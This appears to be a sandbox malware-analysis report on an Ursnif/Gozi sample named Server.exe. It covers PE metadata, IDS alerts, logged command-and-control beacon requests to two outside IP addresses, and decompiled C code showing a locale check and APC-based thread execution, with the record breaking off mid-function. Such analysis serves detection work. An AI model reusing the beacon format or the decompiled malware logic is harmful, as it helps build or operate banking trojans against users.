          IMAGE_DIRECTORY_ENTRY_EXCEPTION0x00x0
          IMAGE_DIRECTORY_ENTRY_SECURITY0x00x0
          IMAGE_DIRECTORY_ENTRY_BASERELOC0x00x0
          IMAGE_DIRECTORY_ENTRY_DEBUG0x00x0
          IMAGE_DIRECTORY_ENTRY_COPYRIGHT0x00x0
          IMAGE_DIRECTORY_ENTRY_GLOBALPTR0x00x0
          IMAGE_DIRECTORY_ENTRY_TLS0x00x0
          IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG0x2b080x40.text
          IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_IAT0x10000x19c.text
          IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT0x00x0
          IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR0x00x0
          IMAGE_DIRECTORY_ENTRY_RESERVED0x00x0
          NameVirtual AddressVirtual SizeRaw SizeXored PEZLIB ComplexityFile TypeEntropyCharacteristics
          .text0x10000xb1ae0xb200False0.5146374648876404data6.0249778256856334IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
          .data0xd0000x9098c0x13400False0.9474812297077922data7.860179869421139IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .comu0x9e0000x960x200False0.02734375data0.0IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ, IMAGE_SCN_MEM_WRITE
          .rsrc0x9f0000xdaf00xdc00False0.41324573863636366data4.47773178292088IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
          NameRVASizeTypeLanguageCountry
          AFX_DIALOG_LAYOUT0xab5980x2data
          TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishFinland
          TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishNorway
          TONIZITOHOWAPEVUMOBEM0xaaea00x598ASCII text, with very long lines (1432), with no line terminatorsSami LappishSweden
          RT_CURSOR0xab5a00x130Device independent bitmap graphic, 32 x 64 x 1, image size 0
          RT_CURSOR0xab6d00xf0Device independent bitmap graphic, 24 x 48 x 1, image size 0
          RT_CURSOR0xab7c00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0
          RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
          RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
          RT_ICON0x9f6800x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
          RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0x9ff280x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishFinland
          RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishNorway
          RT_ICON0xa0ff80x8a8Device independent bitmap graphic, 32 x 64 x 8, image size 0Sami LappishSweden
          RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
          RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
          RT_ICON0xa18a00x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
          RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xa3e480x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishFinland
          RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishNorway
          RT_ICON0xa4f200xea8Device independent bitmap graphic, 48 x 96 x 8, image size 0Sami LappishSweden
          RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishFinland
          RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishNorway
          RT_ICON0xa5dc80x6c8Device independent bitmap graphic, 24 x 48 x 8, image size 0Sami LappishSweden
          RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishFinland
          RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishNorway
          RT_ICON0xa64900x568Device independent bitmap graphic, 16 x 32 x 8, image size 0Sami LappishSweden
          RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishFinland
          RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishNorway
          RT_ICON0xa69f80x25a8Device independent bitmap graphic, 48 x 96 x 32, image size 0Sami LappishSweden
          RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishFinland
          RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishNorway
          RT_ICON0xa8fa00x10a8Device independent bitmap graphic, 32 x 64 x 32, image size 0Sami LappishSweden
          RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishFinland
          RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishNorway
          RT_ICON0xaa0480x988Device independent bitmap graphic, 24 x 48 x 32, image size 0Sami LappishSweden
          RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishFinland
          RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishNorway
          RT_ICON0xaa9d00x468Device independent bitmap graphic, 16 x 32 x 32, image size 0Sami LappishSweden
          RT_ACCELERATOR0xab4e00x78dataSami LappishFinland
          RT_ACCELERATOR0xab4e00x78dataSami LappishNorway
          RT_ACCELERATOR0xab4e00x78dataSami LappishSweden
          RT_ACCELERATOR0xab4380xa8dataSami LappishFinland
          RT_ACCELERATOR0xab4380xa8dataSami LappishNorway
          RT_ACCELERATOR0xab4380xa8dataSami LappishSweden
          RT_GROUP_CURSOR0xac8680x30data
          RT_GROUP_ICON0xa4ef00x30dataSami LappishFinland
          RT_GROUP_ICON0xa4ef00x30dataSami LappishNorway
          RT_GROUP_ICON0xa4ef00x30dataSami LappishSweden
          RT_GROUP_ICON0xa0fd00x22dataSami LappishFinland
          RT_GROUP_ICON0xa0fd00x22dataSami LappishNorway
          RT_GROUP_ICON0xa0fd00x22dataSami LappishSweden
          RT_GROUP_ICON0xaae380x68dataSami LappishFinland
          RT_GROUP_ICON0xaae380x68dataSami LappishNorway
          RT_GROUP_ICON0xaae380x68dataSami LappishSweden
          RT_VERSION0xac8980x258data
          None0xab5580xadataSami LappishFinland
          None0xab5580xadataSami LappishNorway
          None0xab5580xadataSami LappishSweden
          None0xab5680xadataSami LappishFinland
          None0xab5680xadataSami LappishNorway
          None0xab5680xadataSami LappishSweden
          None0xab5780xadataSami LappishFinland
          None0xab5780xadataSami LappishNorway
          None0xab5780xadataSami LappishSweden
          None0xab5880xadataSami LappishFinland
          None0xab5880xadataSami LappishNorway
          None0xab5880xadataSami LappishSweden
          DLLImport
          KERNEL32.dllPulseEvent, SetDefaultCommConfigA, FindFirstFileW, EnumCalendarInfoA, CopyFileExW, GetConsoleAliasExesA, _llseek, BuildCommDCBAndTimeoutsA, GetConsoleAliasA, GetCurrentProcess, InterlockedCompareExchange, GetWindowsDirectoryA, EnumTimeFormatsA, WriteFileGather, EnumResourceTypesA, ActivateActCtx, GetFirmwareEnvironmentVariableA, LoadLibraryW, Sleep, ReadConsoleInputA, LeaveCriticalSection, GetFileAttributesW, WritePrivateProfileSectionW, TerminateProcess, IsDBCSLeadByte, lstrcmpW, GlobalUnlock, RaiseException, SetCurrentDirectoryA, SetLastError, GetProcAddress, GlobalGetAtomNameA, OpenWaitableTimerA, LocalAlloc, FindFirstVolumeMountPointW, AddAtomA, FindNextFileA, GetModuleHandleA, GetCPInfoExA, SetCalendarInfoA, DeleteFileW, EnumCalendarInfoExA, LocalFree, GetLastError, DeleteFileA, GetCommandLineA, HeapSetInformation, GetStartupInfoW, EnterCriticalSection, SetFilePointer, SetHandleCount, GetStdHandle, InitializeCriticalSectionAndSpinCount, GetFileType, DeleteCriticalSection, UnhandledExceptionFilter, SetUnhandledExceptionFilter, IsDebuggerPresent, EncodePointer, DecodePointer, GetModuleHandleW, ExitProcess, WriteFile, GetModuleFileNameW, GetModuleFileNameA, FreeEnvironmentStringsW, WideCharToMultiByte, GetEnvironmentStringsW, TlsAlloc, TlsGetValue, TlsSetValue, TlsFree, InterlockedIncrement, GetCurrentThreadId, InterlockedDecrement, HeapCreate, QueryPerformanceCounter, GetTickCount, GetCurrentProcessId, GetSystemTimeAsFileTime, HeapFree, SetStdHandle, GetConsoleCP, GetConsoleMode, FlushFileBuffers, RtlUnwind, GetCPInfo, GetACP, GetOEMCP, IsValidCodePage, HeapAlloc, HeapReAlloc, WriteConsoleW, MultiByteToWideChar, IsProcessorFeaturePresent, LCMapStringW, GetStringTypeW, HeapSize, CloseHandle, CreateFileW
          USER32.dllLoadMenuA
          Language of compilation systemCountry where language is spokenMap
          Sami LappishFinland
          Sami LappishNorway
          Sami LappishSweden
          TimestampProtocolSIDMessageSource PortDest PortSource IPDest IP
          192.168.2.6193.233.175.11349705802033204 03/20/23-13:15:36.320401TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4970580192.168.2.6193.233.175.113
          192.168.2.662.173.142.8149704802033203 03/20/23-13:15:16.126464TCP2033203ET TROJAN Ursnif Variant CnC Beacon - URI Struct M1 (_2B)4970480192.168.2.662.173.142.81
          192.168.2.662.173.142.8149704802033204 03/20/23-13:15:16.126464TCP2033204ET TROJAN Ursnif Variant CnC Beacon - URI Struct M2 (_2F)4970480192.168.2.662.173.142.81
          TimestampSource PortDest PortSource IPDest IP
          Mar 20, 2023 13:15:16.062493086 CET4970480192.168.2.662.173.142.81
          Mar 20, 2023 13:15:16.122262955 CET804970462.173.142.81192.168.2.6
          Mar 20, 2023 13:15:16.122481108 CET4970480192.168.2.662.173.142.81
          Mar 20, 2023 13:15:16.126463890 CET4970480192.168.2.662.173.142.81
          Mar 20, 2023 13:15:16.185555935 CET804970462.173.142.81192.168.2.6
          Mar 20, 2023 13:15:16.186232090 CET804970462.173.142.81192.168.2.6
          Mar 20, 2023 13:15:16.186345100 CET4970480192.168.2.662.173.142.81
          Mar 20, 2023 13:15:16.187962055 CET4970480192.168.2.662.173.142.81
          Mar 20, 2023 13:15:16.247250080 CET804970462.173.142.81192.168.2.6
          Mar 20, 2023 13:15:36.216483116 CET4970580192.168.2.6193.233.175.113
          Mar 20, 2023 13:15:36.319710016 CET8049705193.233.175.113192.168.2.6
          Mar 20, 2023 13:15:36.319972038 CET4970580192.168.2.6193.233.175.113
          Mar 20, 2023 13:15:36.320400953 CET4970580192.168.2.6193.233.175.113
          Mar 20, 2023 13:15:36.423428059 CET8049705193.233.175.113192.168.2.6
          Mar 20, 2023 13:15:36.424657106 CET8049705193.233.175.113192.168.2.6
          Mar 20, 2023 13:15:36.424779892 CET4970580192.168.2.6193.233.175.113
          Mar 20, 2023 13:15:36.424930096 CET4970580192.168.2.6193.233.175.113
          Mar 20, 2023 13:15:36.739191055 CET4970580192.168.2.6193.233.175.113
          Mar 20, 2023 13:15:36.842247963 CET8049705193.233.175.113192.168.2.6
          TimestampSource PortDest PortSource IPDest IP
          Mar 20, 2023 13:13:55.859003067 CET4978653192.168.2.68.8.8.8
          Mar 20, 2023 13:13:55.886168003 CET53497868.8.8.8192.168.2.6
          TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
          Mar 20, 2023 13:13:55.859003067 CET192.168.2.68.8.8.80x5e5aStandard query (0)checklist.skype.comA (IP address)IN (0x0001)false
          TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
          Mar 20, 2023 13:13:55.886168003 CET8.8.8.8192.168.2.60x5e5aName error (3)checklist.skype.comnonenoneA (IP address)IN (0x0001)false
          • 62.173.142.81
          • 193.233.175.113
          Session IDSource IPSource PortDestination IPDestination PortProcess
          0192.168.2.64970462.173.142.8180C:\Users\user\Desktop\Server.exe
          TimestampkBytes transferredDirectionData
          Mar 20, 2023 13:15:16.126463890 CET102OUTGET /drew/vtZ_2FDIi/MRLim5q_2FPOOIVwJV5p/mDG55l02bkwr36hqtHV/_2BXyU_2BkyUgVl9WIyeMc/2k07Y9nJ9nLtT/PcL77Drj/unLXMitiTeAgURShweMUOiB/jO6Gh6u4qj/R0YL8nr8_2Fe_2F8S/NmYC2zbFo_2F/_2F9OVp7R5L/glgHLP7bYaSidB/FZsufB1rfZCbhP2GWCC1X/tQ2Xe4zo9AyYJ7HA/jNvemogj1MfecHx/YKLEAqQON4Cy4b59f3/zq6LmLb43/Vud6lYhHL1LCLqJWQEpj/MZMy2z9wXkXjHl/Y_2BX.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 62.173.142.81
          Connection: Keep-Alive
          Cache-Control: no-cache


          Session IDSource IPSource PortDestination IPDestination PortProcess
          1192.168.2.649705193.233.175.11380C:\Users\user\Desktop\Server.exe
          TimestampkBytes transferredDirectionData
          Mar 20, 2023 13:15:36.320400953 CET103OUTGET /drew/qHKukbBQWu/Xw77sqXTqtrxRWpPD/yl9MR0Y2eNmn/GbsfhYjdl8H/5GaIgAKgHB90sh/aMn4M6bKKJciYELDTreaM/i8dqMbDS0rDZpO_2/F2s0PNMupq8bNg2/sWxA9_2FGI7DvJntWq/sJDzxIUTO/r8bT3UibSNEQXXaTJdFi/yG6uB8JAsWc6GRKrJig/fWv9nw4MT1weBq8HJPcdl7/ZF86bHFVi_2FJ/yinUV20K/IPPC4VuFn7ORSOMnH_2FY6_/2FwmfjECDI/_2B41PRFw9jRfkH5W/0EbKz9E3ebE/0M10.jlk HTTP/1.1
          User-Agent: Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 10.0)
          Host: 193.233.175.113
          Connection: Keep-Alive
          Cache-Control: no-cache


          Click to jump to process

          Click to jump to process

          Target ID:0
          Start time:13:13:41
          Start date:20/03/2023
          Path:C:\Users\user\Desktop\Server.exe
          Wow64 process (32bit):true
          Commandline:C:\Users\user\Desktop\Server.exe
          Imagebase:0x400000
          File size:182272 bytes
          MD5 hash:9565B4A15A8593EA3EC1F3C9D0A2E11A
          Has elevated privileges:true
          Has administrator privileges:true
          Programmed in:C, C++ or other language
          Yara matches:
          • Rule: Windows_Trojan_RedLineStealer_ed346e4c, Description: unknown, Source: 00000000.00000002.513518394.00000000004E6000.00000040.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Smokeloader_3687686f, Description: unknown, Source: 00000000.00000002.513718671.0000000001FC0000.00000040.00001000.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000002.513908853.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406328098.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406192981.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406310298.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406101502.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406169699.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406228836.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406261787.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: JoeSecurity_Ursnif, Description: Yara detected Ursnif, Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: Joe Security
          • Rule: Windows_Trojan_Gozi_fd494041, Description: unknown, Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          • Rule: Windows_Trojan_Gozi_261f5ac5, Description: unknown, Source: 00000000.00000003.406142288.0000000002CA8000.00000004.00000020.00020000.00000000.sdmp, Author: unknown
          Reputation:low

          Reset < >

            Control-flow Graph

            C-Code - Quality: 85%
            			E004019F1() {
            				long _v8;
            				char _v12;
            				char _v16;
            				void* _v40;
            				long _t28;
            				long _t30;
            				long _t31;
            				signed short _t33;
            				void* _t37;
            				long _t40;
            				long _t41;
            				void* _t48;
            				intOrPtr _t50;
            				signed int _t57;
            				signed int _t58;
            				long _t63;
            				long _t65;
            				intOrPtr _t66;
            				void* _t71;
            				void* _t75;
            				signed int _t77;
            				signed int _t78;
            				void* _t82;
            				intOrPtr* _t83;
            
            				_t28 = E00401D68();
            				_v8 = _t28;
            				if(_t28 != 0) {
            					return _t28;
            				}
            				do {
            					_t77 = 0;
            					_v12 = 0;
            					_t63 = 0x30;
            					do {
            						_t71 = E004012E6(_t63);
            						if(_t71 == 0) {
            							_v8 = 8;
            						} else {
            							_t57 = NtQuerySystemInformation(8, _t71, _t63,  &_v12); // executed
            							_t67 = _t57;
            							_t58 = _t57 & 0x0000ffff;
            							_v8 = _t58;
            							if(_t58 == 4) {
            								_t63 = _t63 + 0x30;
            							}
            							_t78 = 0x13;
            							_t10 = _t67 + 1; // 0x1
            							_t77 =  *_t71 % _t78 + _t10;
            							E00401BA9(_t71);
            						}
            					} while (_v8 != 0);
            					_t30 = E00401688(_t77); // executed
            					_v8 = _t30;
            					Sleep(_t77 << 4); // executed
            					_t31 = _v8;
            				} while (_t31 == 0x15);
            				if(_t31 != 0) {
            					L30:
            					return _t31;
            				}
            				_v12 = 0;
            				_t33 = GetLocaleInfoA(0x400, 0x5a,  &_v12, 4); // executed
            				if(_t33 == 0) {
            					__imp__GetSystemDefaultUILanguage();
            					_t67 =  &_v12;
            					VerLanguageNameA(_t33 & 0xffff,  &_v12, 4);
            				}
            				if(_v12 == 0x5552) {
            					L28:
            					_t31 = _v8;
            					if(_t31 == 0xffffffff) {
            						_t31 = GetLastError();
            					}
            					goto L30;
            				} else {
            					if(E00401800(_t67,  &_v16) != 0) {
            						 *0x404178 = 0;
            						L20:
            						_t37 = CreateThread(0, 0, __imp__SleepEx,  *0x404180, 0, 0); // executed
            						_t82 = _t37;
            						if(_t82 == 0) {
            							L27:
            							_v8 = GetLastError();
            							goto L28;
            						}
            						_t40 = QueueUserAPC(E0040139F, _t82,  &_v40); // executed
            						if(_t40 == 0) {
            							_t65 = GetLastError();
            							TerminateThread(_t82, _t65);
            							CloseHandle(_t82);
            							_t82 = 0;
            							SetLastError(_t65);
            						}
            						if(_t82 == 0) {
            							goto L27;
            						} else {
            							_t41 = WaitForSingleObject(_t82, 0xffffffff);
            							_v8 = _t41;
            							if(_t41 == 0) {
            								GetExitCodeThread(_t82,  &_v8);
            							}
            							CloseHandle(_t82);
            							goto L28;
            						}
            					}
            					_t66 = _v16;
            					_t83 = __imp__GetLongPathNameW;
            					_t48 =  *_t83(_t66, 0, 0); // executed
            					_t75 = _t48;
            					if(_t75 == 0) {
            						L18:
            						 *0x404178 = _t66;
            						goto L20;
            					}
            					_t22 = _t75 + 2; // 0x2
            					_t50 = E004012E6(_t75 + _t22);
            					 *0x404178 = _t50;
            					if(_t50 == 0) {
            						goto L18;
            					}
            					 *_t83(_t66, _t50, _t75); // executed
            					E00401BA9(_t66);
            					goto L20;
            				}
            			}



























            0x004019f7
            0x004019fc
            0x00401a01
            0x00401ba8
            0x00401ba8
            0x00401a0a
            0x00401a0a
            0x00401a0e
            0x00401a11
            0x00401a12
            0x00401a18
            0x00401a1c
            0x00401a53
            0x00401a1e
            0x00401a26
            0x00401a2c
            0x00401a2e
            0x00401a33
            0x00401a39
            0x00401a3b
            0x00401a3b
            0x00401a42
            0x00401a48
            0x00401a48
            0x00401a4c
            0x00401a4c
            0x00401a5a
            0x00401a61
            0x00401a6a
            0x00401a6d
            0x00401a73
            0x00401a76
            0x00401a7f
            0x00401ba4
            0x00000000
            0x00401ba6
            0x00401a92
            0x00401a95
            0x00401a9d
            0x00401a9f
            0x00401aaa
            0x00401ab2
            0x00401ab2
            0x00401ac0
            0x00401b96
            0x00401b96
            0x00401b9c
            0x00401b9e
            0x00401b9e
            0x00000000
            0x00401ac6
            0x00401ad1
            0x00401b0f
            0x00401b15
            0x00401b27
            0x00401b2d
            0x00401b31
            0x00401b8d
            0x00401b93
            0x00000000
            0x00401b93
            0x00401b3d
            0x00401b4b
            0x00401b53
            0x00401b57
            0x00401b5e
            0x00401b61
            0x00401b63
            0x00401b63
            0x00401b6b
            0x00000000
            0x00401b6d
            0x00401b70
            0x00401b76
            0x00401b7b
            0x00401b82
            0x00401b82
            0x00401b89
            0x00000000
            0x00401b89
            0x00401b6b
            0x00401ad3
            0x00401ad8
            0x00401adf
            0x00401ae1
            0x00401ae5
            0x00401b07
            0x00401b07
            0x00000000
            0x00401b07
            0x00401ae7
            0x00401aec
            0x00401af1
            0x00401af8
            0x00000000
            0x00000000
            0x00401afd
            0x00401b00
            0x00000000
            0x00401b00

            APIs
              • Part of subcall function 00401D68: CreateEventA.KERNEL32(00000000,00000001,00000000,00000000,00000000,004019FC), ref: 00401D77
              • Part of subcall function 00401D68: GetVersion.KERNEL32 ref: 00401D86
              • Part of subcall function 00401D68: GetCurrentProcessId.KERNEL32 ref: 00401DA2
              • Part of subcall function 00401D68: OpenProcess.KERNEL32(0010047A,00000000,00000000), ref: 00401DBB
              • Part of subcall function 004012E6: RtlAllocateHeap.NTDLL(00000000,?,00401A18,00000030,?,00000000), ref: 004012F2
            • NtQuerySystemInformation.NTDLL ref: 00401A26
            • Sleep.KERNELBASE(00000000,00000000,00000030,?,00000000), ref: 00401A6D
            • GetLocaleInfoA.KERNELBASE(00000400,0000005A,?,00000004,?,00000000), ref: 00401A95
            • GetSystemDefaultUILanguage.KERNEL32(?,00000000), ref: 00401A9F
            • VerLanguageNameA.KERNEL32(?,?,00000004,?,00000000), ref: 00401AB2
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401ADF
            • GetLongPathNameW.KERNELBASE(?,00000000,00000000), ref: 00401AFD
            • CreateThread.KERNELBASE(00000000,00000000,00000000,00000000,?,00000000), ref: 00401B27
            • QueueUserAPC.KERNELBASE(0040139F,00000000,?,?,00000000), ref: 00401B3D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B4D
            • TerminateThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B57
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B5E
            • SetLastError.KERNEL32(00000000,?,00000000), ref: 00401B63
            • WaitForSingleObject.KERNEL32(00000000,000000FF,?,00000000), ref: 00401B70
            • GetExitCodeThread.KERNEL32(00000000,00000000,?,00000000), ref: 00401B82
            • CloseHandle.KERNEL32(00000000,?,00000000), ref: 00401B89
            • GetLastError.KERNEL32(?,00000000), ref: 00401B8D
            • GetLastError.KERNEL32(?,00000000), ref: 00401B9E
            Memory Dump Source
            • Source File: 00000000.00000002.513286183.0000000000400000.00000040.00000001.01000000.00000003.sdmp, Offset: 00400000, based on PE: true
            • Associated: 00000000.00000002.513286183.0000000000403000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000405000.00000040.00000001.01000000.00000003.sdmpDownload File
            • Associated: 00000000.00000002.513286183.0000000000407000.00000040.00000001.01000000.00000003.sdmpDownload File
            Joe Sandbox IDA Plugin
            • Snapshot File: hcaresult_0_2_400000_Server.jbxd
            Similarity
            • API ID: ErrorLast$NameThread$CloseCreateHandleLanguageLongPathProcessSystem$AllocateCodeCurrentDefaultEventExitHeapInfoInformationLocaleObjectOpenQueryQueueSingleSleepTerminateUserVersionWait
            • String ID:
            • API String ID: 3475612337-0
            • Opcode ID: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction ID: e4abbca9115d716754b6864e37b0832fe911a2439c52af45cdd796d0275508de
            • Opcode Fuzzy Hash: 63886129df23de6e3ef072691f354a937fc67659b51f8fa83a58e9985e998f06
            • Instruction Fuzzy Hash: 4E519E71901214ABE721AFA59D48EAFBA7CAB45755F104177F901F32A0EB389A40CB68
            Uniqueness

            Uniqueness Score: -1.00%

            Control-flow Graph

            • Executed
            • Not Executed
            control_flow_graph 113 2021508-2021548 CryptAcquireContextW 114 202154e-202158a memcpy CryptImportKey 113->114 115 202169f-20216a5 113->115 116 2021590-20215a2 CryptSetKeyParam 114->116 117 202168a-2021690 114->117 124 20216a8-20216af 115->124 118 2021676-202167c 116->118 119 20215a8-20215b1 116->119 126 2021693-202169d CryptReleaseContext 117->126 129 202167f-2021688 CryptDestroyKey 118->129 122 20215b3-20215b5 119->122 123 20215b9-20215c6 call 20233dc 119->123 122->123 127 20215b7 122->127 131 20215cc-20215d5 123->131 132 202166d-2021674 123->132 126->124 127->123 129->126 133 20215d8-20215e0 131->133 132->129 134 20215e2 133->134 135 20215e5-2021602 memcpy 133->135 134->135 136 2021604-202161b CryptEncrypt 135->136 137 202161d-2021629 135->137 138 2021632-2021634 136->138 137->138 139 2021636-2021640 138->139 140 2021644-202164f 138->140 139->133 141 2021642 139->141 142 2021651-2021661 140->142 144 2021663-202166b call 20261da 140->144 141->142 142->129 144->129
            C-Code - Quality: 50%
            			E02021508(int __eax, intOrPtr _a4, int _a8, void* _a12, intOrPtr* _a16, intOrPtr* _a20) {
            				int _v8;
            				long* _v12;
            				int _v16;
            				void* _v20;
            				long* _v24;
            				void* _v39;
            				char _v40;
            				void _v56;
            				int _v60;
            				intOrPtr _v64;
            				void _v67;
            				char _v68;
            				void* _t61;
            				int _t68;
            				signed int _t76;
            				int _t79;
            				int _t81;
            				void* _t85;
            				long _t86;
